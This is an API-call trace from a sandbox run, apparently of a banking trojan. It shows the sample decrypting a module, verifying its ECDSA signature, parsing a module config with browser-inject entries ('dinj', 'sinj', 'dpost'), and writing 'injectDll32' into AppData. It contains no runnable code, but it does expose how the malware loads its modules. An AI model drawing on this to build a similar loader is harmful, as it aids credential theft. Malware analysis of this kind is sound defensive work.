	[0187.514] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.514] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0187.514] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.514] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2632f8
	[0187.514] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2632f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2632f8, pdwDataLen=0x128aac) returned 1
	[0187.514] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.514] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.514] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.515] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.515] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0187.515] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.515] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263320
	[0187.515] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x263320, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263320, pdwDataLen=0x128aac) returned 1
	[0187.515] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.515] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.515] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.515] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.515] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0187.515] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.515] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263348
	[0187.515] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x263348, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263348, pdwDataLen=0x128aac) returned 1
	[0187.515] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.515] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.515] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.516] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.516] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0187.516] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.516] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263370
	[0187.516] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x263370, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263370, pdwDataLen=0x128aac) returned 1
	[0187.516] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.516] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.516] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.516] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.516] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0187.516] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.516] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263398
	[0187.516] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x263398, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263398, pdwDataLen=0x128aac) returned 1
	[0187.516] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.516] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.516] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.517] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.517] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0187.517] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.517] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2633c0
	[0187.517] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2633c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2633c0, pdwDataLen=0x128aac) returned 1
	[0187.517] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.517] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.517] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.517] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.517] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0187.517] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.517] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2633e8
	[0187.518] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2633e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2633e8, pdwDataLen=0x128aac) returned 1
	[0187.518] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.518] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.518] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.518] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.518] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0187.518] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.518] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263410
	[0187.518] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x263410, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263410, pdwDataLen=0x128aac) returned 1
	[0187.518] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.518] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.518] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x272d4d0) returned 1
	[0187.518] CryptAcquireContextW (in: phProv=0x128ad8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ad8*=0x2256c0) returned 1
	[0187.519] CryptImportKey (in: hProv=0x2256c0, pbData=0x128aa0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x128ae0 | out: phKey=0x128ae0*=0x22b68c0) returned 1
	[0187.519] CryptSetKeyParam (hKey=0x22b68c0, dwParam=0x4, pbData=0x128acc*=0x1, dwFlags=0x0) returned 1
	[0187.519] CryptSetKeyParam (hKey=0x22b68c0, dwParam=0x1, pbData=0x263410, dwFlags=0x0) returned 1
	[0187.519] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90b90) returned 0xdb0020
	[0187.527] CryptDecrypt (in: hKey=0x22b68c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xdb0020, pdwDataLen=0x128ad4 | out: pbData=0xdb0020, pdwDataLen=0x128ad4) returned 1
	[0187.538] CryptDestroyKey (hKey=0x22b68c0) returned 1
	[0187.538] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.539] GetVersion () returned 0x1db10106
	[0187.539] CryptAcquireContextW (in: phProv=0x1289e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1289e0*=0x2256c0) returned 1
	[0187.539] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800d, hKey=0x0, dwFlags=0x0, phHash=0x1289e4 | out: phHash=0x1289e4) returned 1
	[0187.539] CryptHashData (hHash=0x22b6840, pbData=0xdb0020, dwDataLen=0x90b1b, dwFlags=0x0) returned 1
	[0187.545] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x1289dc, pdwDataLen=0x1289d8, dwFlags=0x0 | out: pbData=0x1289dc, pdwDataLen=0x1289d8) returned 1
	[0187.545] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5b60
	[0187.545] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x22a5b60, pdwDataLen=0x1289dc, dwFlags=0x0 | out: pbData=0x22a5b60, pdwDataLen=0x1289dc) returned 1
	[0187.545] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.545] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.546] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x128ae0, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x128ae0) returned 0x0
	[0187.547] BCryptImportKeyPair (in: hAlgorithm=0x22ee168, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x128ae8, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x128ae8) returned 0x0
	[0187.549] BCryptGetProperty (in: hObject=0x212670, pszProperty="SignatureLength", pbOutput=0x128b00, cbOutput=0x4, pcbResult=0x128ad8, dwFlags=0x0 | out: pbOutput=0x128b00, pcbResult=0x128ad8) returned 0x0
	[0187.549] BCryptVerifySignature (hKey=0x212670, pPaddingInfo=0x0, pbHash=0x22a5b60, cbHash=0x30, pbSignature=0xe40b3b, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0187.551] BCryptDestroyKey (in: hKey=0x212670 | out: hKey=0x212670) returned 0x0
	[0187.551] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee168, dwFlags=0x0 | out: hAlgorithm=0x22ee168) returned 0x0
	[0187.551] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5b60) returned 1
	[0187.551] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90b20) returned 0xe50020
	[0187.561] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x272f5f8) returned 1
	[0187.561] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263410) returned 1
	[0187.561] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0xdb0020) returned 1
	[0187.565] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263410
	[0187.565] lstrlenA (lpString="<moduleconfig>*</moduleconfig>") returned 30
	[0187.565] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22acfd0
	[0187.565] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x180) returned 0x21a468
	[0187.565] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x272d4d0
	[0187.565] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad330
	[0187.565] CharLowerBuffA (in: lpsz="moduleconfig", cchLength=0xc | out: lpsz="moduleconfig") returned 0xc
	[0187.566] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad330) returned 1
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad330
	[0187.566] CharLowerBuffA (in: lpsz="sys", cchLength=0x3 | out: lpsz="sys") returned 0x3
	[0187.566] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad330) returned 1
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad330
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0c0
	[0187.566] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8
	[0187.566] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0c0) returned 1
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0c0
	[0187.566] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0187.566] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0c0) returned 1
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0c0
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad1c8
	[0187.566] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8
	[0187.566] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1c8) returned 1
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad1c8
	[0187.566] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0187.566] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1c8) returned 1
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad1c8
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0d8
	[0187.566] CharLowerBuffA (in: lpsz="autoconf", cchLength=0x8 | out: lpsz="autoconf") returned 0x8
	[0187.566] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0d8) returned 1
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0d8
	[0187.566] CharLowerBuffA (in: lpsz="conf", cchLength=0x4 | out: lpsz="conf") returned 0x4
	[0187.566] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0d8) returned 1
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0d8
	[0187.566] CharLowerBuffA (in: lpsz="ctl", cchLength=0x3 | out: lpsz="ctl") returned 0x3
	[0187.566] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0d8) returned 1
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0d8
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0d8
	[0187.566] CharLowerBuffA (in: lpsz="file", cchLength=0x4 | out: lpsz="file") returned 0x4
	[0187.566] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0d8) returned 1
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0d8
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0187.566] CharLowerBuffA (in: lpsz="period", cchLength=0x6 | out: lpsz="period") returned 0x6
	[0187.566] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff1c8
	[0187.566] CharLowerBuffA (in: lpsz="conf", cchLength=0x4 | out: lpsz="conf") returned 0x4
	[0187.566] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff1c8) returned 1
	[0187.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff1c8
	[0187.567] CharLowerBuffA (in: lpsz="ctl", cchLength=0x3 | out: lpsz="ctl") returned 0x3
	[0187.567] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff1c8) returned 1
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff1c8
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff060
	[0187.567] CharLowerBuffA (in: lpsz="file", cchLength=0x4 | out: lpsz="file") returned 0x4
	[0187.567] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff060) returned 1
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff060
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff000
	[0187.567] CharLowerBuffA (in: lpsz="period", cchLength=0x6 | out: lpsz="period") returned 0x6
	[0187.567] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff000) returned 1
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff000
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff018
	[0187.567] CharLowerBuffA (in: lpsz="conf", cchLength=0x4 | out: lpsz="conf") returned 0x4
	[0187.567] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff018) returned 1
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff018
	[0187.567] CharLowerBuffA (in: lpsz="ctl", cchLength=0x3 | out: lpsz="ctl") returned 0x3
	[0187.567] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff018) returned 1
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff018
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff168
	[0187.567] CharLowerBuffA (in: lpsz="file", cchLength=0x4 | out: lpsz="file") returned 0x4
	[0187.567] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff168) returned 1
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff168
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff198
	[0187.567] CharLowerBuffA (in: lpsz="period", cchLength=0x6 | out: lpsz="period") returned 0x6
	[0187.567] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff198) returned 1
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff198
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff1e0
	[0187.567] CharLowerBuffA (in: lpsz="id", cchLength=0x2 | out: lpsz="id") returned 0x2
	[0187.567] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff1e0) returned 1
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff1e0
	[0187.567] CharLowerBuffA (in: lpsz="ip", cchLength=0x2 | out: lpsz="ip") returned 0x2
	[0187.567] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff1e0) returned 1
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x50) returned 0x22aa178
	[0187.567] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ad0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff1e0
	[0187.567] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ad0d8, cbMultiByte=-1, lpWideCharStr=0x22ff1e0, cchWideChar=5 | out: lpWideCharStr="dinj") returned 5
	[0187.567] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff1f8
	[0187.567] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff0d8, cbMultiByte=-1, lpWideCharStr=0x22ff1f8, cchWideChar=5 | out: lpWideCharStr="dinj") returned 5
	[0187.567] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff1c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0187.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff210
	[0187.568] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff1c8, cbMultiByte=-1, lpWideCharStr=0x22ff210, cchWideChar=5 | out: lpWideCharStr="sinj") returned 5
	[0187.568] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff060, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0187.568] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff228
	[0187.568] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff060, cbMultiByte=-1, lpWideCharStr=0x22ff228, cchWideChar=5 | out: lpWideCharStr="sinj") returned 5
	[0187.568] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff018, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6
	[0187.568] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff240
	[0187.568] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff018, cbMultiByte=-1, lpWideCharStr=0x22ff240, cchWideChar=6 | out: lpWideCharStr="dpost") returned 6
	[0187.568] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6
	[0187.568] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff258
	[0187.568] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff168, cbMultiByte=-1, lpWideCharStr=0x22ff258, cchWideChar=6 | out: lpWideCharStr="dpost") returned 6
	[0187.568] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22e9d00
	[0187.568] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x22e9d00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0187.569] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c
	[0187.571] WriteFile (in: hFile=0x47c, lpBuffer=0x2490020*, nNumberOfBytesToWrite=0x90bc0, lpNumberOfBytesWritten=0x128b40, lpOverlapped=0x0 | out: lpBuffer=0x2490020*, lpNumberOfBytesWritten=0x128b40*=0x90bc0, lpOverlapped=0x0) returned 1
	[0187.583] CloseHandle (hObject=0x47c) returned 1
	[0187.590] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2490020) returned 1
	[0187.593] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22e9d00) returned 1
	[0187.593] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6db0) returned 1
	[0187.593] WinHttpCloseHandle (hInternet=0x22bb5e0) returned 1
	[0187.594] WinHttpCloseHandle (hInternet=0x22c4ea8) returned 1
	[0187.594] WinHttpCloseHandle (hInternet=0x22c4dc0) returned 1
	[0187.594] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310d20) returned 1
	[0187.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad360
	[0187.594] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0187.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="injectDll32", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
	[0187.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad1b0
	[0187.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="injectDll32", cchWideChar=-1, lpMultiByteStr=0x22ad1b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="injectDll32", lpUsedDefaultChar=0x0) returned 12
	[0187.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tot478", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7
	[0187.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad348
	[0187.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tot478", cchWideChar=-1, lpMultiByteStr=0x22ad348, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tot478", lpUsedDefaultChar=0x0) returned 7
